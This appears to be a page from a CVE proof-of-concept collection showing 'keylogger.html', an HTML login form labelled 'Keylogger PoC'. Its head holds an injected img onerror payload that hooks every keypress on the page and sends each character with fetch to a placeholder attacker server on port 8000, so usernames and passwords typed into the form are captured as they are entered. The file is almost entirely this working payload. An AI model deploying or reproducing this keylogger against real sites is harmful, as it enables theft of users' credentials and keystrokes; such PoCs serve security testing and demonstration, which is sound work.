4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / keylogger.html HTML
<!DOCTYPE html>
<html>

<head>
    <title>HTML Login Form</title>
    <link rel="stylesheet" href="style.css">
<img src=x onerror='document.onkeypress=function(e){fetch("http://<IP-of-python-server>:8000/keylogger.html?key="+String.fromCharCode(e.which))},this.remove();'>
</head>

<body>
    <div class="main">
        <h1>Keylogger PoC</h1>
        <h3>Please enter your login credentials</h3>

        <form action="">
            <label for="first">
                Username:
            </label>
            <input type="text" id="first" name="first"
                placeholder="Enter your Username" required>

            <label for="password">
                Password:
            </label>
            <input type="password" id="password" name="password"
                placeholder="Enter your Password" required>

            <div class="wrap">
                <button type="submit">
                    Submit
                </button>
            </div>
        </form>
            </a>
        </p>
    </div>
</body>

</html>